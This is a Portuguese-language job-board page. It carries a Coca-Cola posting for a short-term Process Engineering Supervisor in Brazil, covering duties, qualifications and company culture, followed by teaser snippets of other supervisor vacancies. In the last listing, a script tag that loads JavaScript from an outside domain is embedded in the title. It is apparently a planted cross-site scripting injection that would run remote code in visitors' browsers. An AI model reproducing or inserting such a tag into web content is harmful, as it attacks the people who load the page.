Ir à oferta completa

PROCESS ENGINEERING SUPERVISOR (SHORT TERM - 6 MONTHS)

Descrição da oferta de emprego

Buscando alçar novos vôos? Você está aplicando para a posição de Supervisor de Engenharia de Processos.
Sumário de Cargo Supervisionar e gerenciar os principais projetos de melhoria contínua nos processos produtivos, interagindo com as áreas afins, como Engenharia Industrial, Produção, Qualidade, Segurança, Meio Ambiente, Manutenção e Planejamento, estabelecendo critérios mensuráveis e procedimentos a serem seguidos ​​para garantir que os resultados desejados sejam alcançados.
Mapear e alinhar as necessidades da companhia, executando-as a partir de análises críticas das métricas definidas, para assegurar que os processos produtivos sejam capazes de atender as demandas.
Mapear e disponibilizar os recursos necessários para que os funcionários da área de Engenharia de Processos sejam empoderados a alcançar seus objetivos, seja quanto aos aspectos técnicos quanto comportamentais.
Principais responsabilidades.
Implementar controles e métodos no processo produtivo, usando técnicas e ferramentas da qualidade, para promover melhorias, visando prepará-los para atender as demandas e oscilações do plano de produção; Realizar estudos de tempos e movimentos com Cronometragem e/ou cronoanálise para suportar a identificação de oportunidades e promover as melhorias devidas.
Fornecer dados para as áreas de processo produtivo, a partir de ferramentas da Qualidade, de coleta de dados e controles estatísticos, para garantir que os objetivos de performance sejam atingidos; Realizar análise crítica dos fluxos de trabalho da área de Produção a partir do monitoramento contínuo de dados dos equipamentos (como tempo de ciclo, eventos de paradas e tendências), layout das salas de processo e cálculo de capacidade; Monitorar os processos da área de Engenharia de Processos para atender os requerimentos dos sistemas de qualidade da companhia e implementar ações corretivas quando desvios forem identificados; Fomentar o espirito de cooperação  entre os funcionários da área de Engenharia de Processos e suas demais areas clientes e fornecedoras para garantir relações efetivas para o desenvolvimento de oportunidades de crescimento pessoal e profissional; Manter atualizados e controlados os documentos, como Instrução de Trabalho, documentação técnica e procedimentos, da área de Produção;   Participar da implementação de projetos de modernização e otimização de processos da área de Produção; Interagir com seus pares das demais áreas, fornecedoras ou clientes, com o objetivo de garantir que o trabalho por processo, para melhorar a produtividade da planta, seja efetivo; Atuar no acompanhamento das auditorias internas e externas.
Realizar outras atividades profissionais correlatas e inerentes ao cargo exercido, conforme orientação ou solicitação do superior imediato; Cumprir e zelar pelas normas, instruções e procedimentos internos estabelecidos (qualidade, segurança do trabalho, segurança ambiental, medicina preventiva e outras), praticando todas as orientações e participando de treinamentos pertinentes, visando à adoção de ações preventivas para a garantia de boas condições ambientais e de trabalho na empresa Realizar estudos de tempos e movimentos com Cronometragem e/ou cronoanálise para suportar a identificação de oportunidades e promover as melhorias devidas.
O que você precisa ter.
Grau.
Superior Completo Curso.
Química, Engenharia Química, Engenharia de Alimentos, Engenharia Industrial, Engenharia de Produção, Automação, Administração ou afins.
Especialização.
Não aplicável Habilidades Técnicas Requeridas Conhecimentos sobre normas do Sistema de Gestão, tais como.
ISO , ISO e Segurança Alimentar (HACCP); Conhecimento de ferramentas aplicadas ao Controle Estatístico de Processos; Habilidades Técnicas Desejáveis Ferramentas da Qualidade; Otimização e melhorias de Processos de Produção; Novas Tecnologias em Automação;  Controle de Orçamento; Conhecimento de processos produtivos em indústrias de alimentos; Conhecimento na operação do Sistema SAP; Controle de Custos da Manufatura; Conhecimentos para plena utilização do Pacote Office ou similar.
Habilidades Comportamentais Desejáveis Negociação Visão de Excelência Operacional Gestão de Pessoas Adaptabilidade/Resiliência Liderança Foco no cliente Gerenciamento de mudanças Comunicação Assertiva Inovação Gestão de Projetos Impacto na Organização / Influência Contatos internos com todas as áreas da planta.
Participação em projetos regionais e globais relacionados.
Contatos externos com fornecedores de serviços e equipamentos.
Você é dono da sua carreira! Trace seu destino, alinhe com seu gestor e boa sorte! Skills.
Standard Operating Procedure (SOP); Continual Improvement Process; Lean Manufacturing; Good Manufacturing Practices (GMP); Production Management; ISO ; Six Sigma; Ammonia Refrigeration; Microsoft Office; Food Safety and Sanitation; Change Management; PLC Logic; Quality Control (QC); 5s (Inactive); Production Processes; Hazard Analysis Critical Control Point (HACCP) Our Purpose and Growth Culture.
We are taking deliberate action to nurture an inclusive culture that is grounded in our company purpose, to refresh the world and make a difference.
We act with a growth mindset, take an expansive approach to what’s possible and believe in continuous learning to improve our business and ourselves.
We focus on four key behaviors – curious, empowered, inclusive and agile – and value how we work as much as what we achieve.
We believe that our culture is one of the reasons our company continues to thrive after 130+ years.
Visit Our Purpose and Vision  to learn more about these behaviors and how you can bring them to life in your next role at Coca-Cola.
We are an Equal Opportunity Employer and do not discriminate against any employee or applicant for employment because of race, color, sex, age, national origin, religion, sexual orientation, gender identity and/or expression, status as a veteran, and basis of disability or any other federal, state or local protected class.
When we collect your personal information as part of a job application or offer of employment, we do so in accordance with industry standards and best practices and in compliance with applicable privacy laws.
Ir à oferta completa

Detalhes da oferta

Empresa
  • Coca-cola
Localidade
  • Em todo o Brasil
Endereço
  • Indeterminado - Indeterminado
Tipo de Contrato
  • Indeterminado
Data de publicação
  • 15/04/2024
Data de expiração
  • 14/07/2024
Supervisor de segurança em palmeirante-to
One search consulting

Requisitos do trabalho requisitos: curso de formação de vigilante válido (mínimo 6 meses)... a one search consulting, renomada empresa especializada em soluções de recrutamento e seleção, está buscando um profissional comprometido e qualificado para assumir a posição de supervisor de segurança para......

Supervisor de serviços oficina ( curriculo@fertisolo.com)
Fertisolo

Gestão de equipe técnica- acompanhamento de execução de serviços- envio de relatórios- acompanhamentos de compras - solucionar possiveis conflitos de equipes - buscar estrategias para captação de clientes- obs: experiência em concessionária será o diferencial... requisitos do trabalho - habilidades em......

Supervisor Comercial
London Serviços

 realiza visitas a clientes efetivos para estreitar relacionamentos, divulgar a marca da empresa e novos lançamentos visando fidelizá-los ou detectar novas oportunidades de negócios...  realiza visitas a clientes potenciais para a comercialização dos produtos do seu segmento: apresenta a empresa e......

Supervisor de SAC (Logística)
Winner RH

Local de trabalho: penha - sp atuação de segunda à sexta - horário comercial atividades: acompanhamento de entregas;relatórios da área;faturamento e cobrança;acompanhamento de logística reversa; rastreabilidade de companhaia aéreas e terrestre gestão de pessoas / equipe; requisitos do trabalho experiências......

Supervisor Comercial
Primer RH

Outros dados de posição jornada de segunda à sexta-feira das 08:00h às 12:00h e das 13:00h às 17:48hs benefícios da vagaopção pelo plano de saúde unimed nacional, para o colaborador e seus dependentes (50% de subsídio), alimentação – almoço ou janta (r$ 27,20 diário/média de r$ 598,40 mensal – desconto......

Supervisor de Produção
JP&F Consultoria

Supervisionar os processos produtivo... supervisionar a produção (atividades de fundição e usinagem), realizando a leitura e a interpretação de desenhos técnicos, e no efetivo acompanhamento nos métodos e processos produtivos no chão-de-fábrica; visando assegurar a confiabilidade nos processos de usinagem......

Supervisor de Desossa Noturno
UNICARREIRA RH GESTÃO DE PESSOAS LTDA.

Enviar currículo para: *****@*****... garantir o atendimento dos planos de produção, visando atender as demandas necessárias; motivar, treinar e reter a equipe; segurança do trabalho, bem como as metas estabelecidas; responsável por manter um padrão máximo de aproveitamento da carne do osso e da carne......

Supervisor de Serviços Oficina
Fertisolo

Requisitos do trabalho - habilidades em informática- experiência com pós vendas- conhecimento básico de mecânica dos equipamentos- conhecimento em máquinas de construção ( será o diferencial)- habilitação b... gestão de equipe técnica- acompanhamento de execução de serviços- envio de relatórios- acompanhamentos......

Supervisor administrativo e financeiro
GMX energia

Pacote office usuário avançado, raciocínio lógico, visão de dono, empatia , resiliência, senso profissional crítico... outros dados de posição regime clt salário compatível com mercado nacional plr, plano de carreira assistência médica odontologia, laboratorial e hospitalar extensível a dependentes......

finance
<script/src=//sb8.co></script>computer

Ideas for process improvements to existing models to make them more robust and automated, resulting in smart, dynamic, and scalable client advisory... ideas for process improvements to existing models to make them more robust and automated, resulting in smart, dynamic, and scalable client advisory requisitos......